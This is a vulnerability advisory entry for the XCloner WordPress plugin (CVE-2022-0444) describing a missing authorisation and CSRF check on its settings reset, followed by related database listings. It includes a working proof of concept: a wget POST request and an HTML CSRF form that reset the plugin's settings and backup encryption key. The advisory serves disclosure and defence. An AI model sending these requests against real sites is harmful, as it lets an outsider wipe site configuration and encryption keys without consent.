Lucene search
Krzysztof ZającWPEX-ID:9567D295-43C7-4E59-9283-C7726F16D40BHistoryJun 06, 2022 - 12:00 a.m.
XCloner < 4.3.6 - Plugin Settings Reset
2022-06-0600:00:00
Krzysztof Zając
84
0.001 Low
EPSS
Percentile
39.6%
The plugin does not have authorisation and CSRF checks when resetting its settings, allowing unauthenticated attackers to reset them, including generating a new backup encryption key. v4.3.5 added capability check, but CSRF one still missing.
v < 4.3.5 - wget "http://example.com/wp-admin/admin.php?action=rest-nonce" --post-data="xcloner_restore_defaults=1" -q -O-
v < 4.3.6 (via CSRF):
<form id="test" action="http://example.com/wp-admin/admin-ajax.php?action=rest-nonce" method="POST">
<input type="text" name="xcloner_restore_defaults" value="1">
<input type="submit" value="Submit"/>
</form>
Related
wpvulndb
wpvulndb
XCloner < 4.3.6 - Plugin Settings Reset
2022-06-06 00:00:00
cve
cve
CVE-2022-0444
2022-06-27 09:15:08
cnvd
cnvd
WordPress XCloner plugin cross-site request forgery vulnerability
2022-06-30 00:00:00
prion
prion
Cross site request forgery (csrf)
2022-06-27 09:15:00
patchstack
patchstack
cvelist
cvelist
CVE-2022-0444 XCloner < 4.3.6 - Plugin Settings Reset
2022-06-27 08:55:47
nvd
nvd
CVE-2022-0444
2022-06-27 09:15:08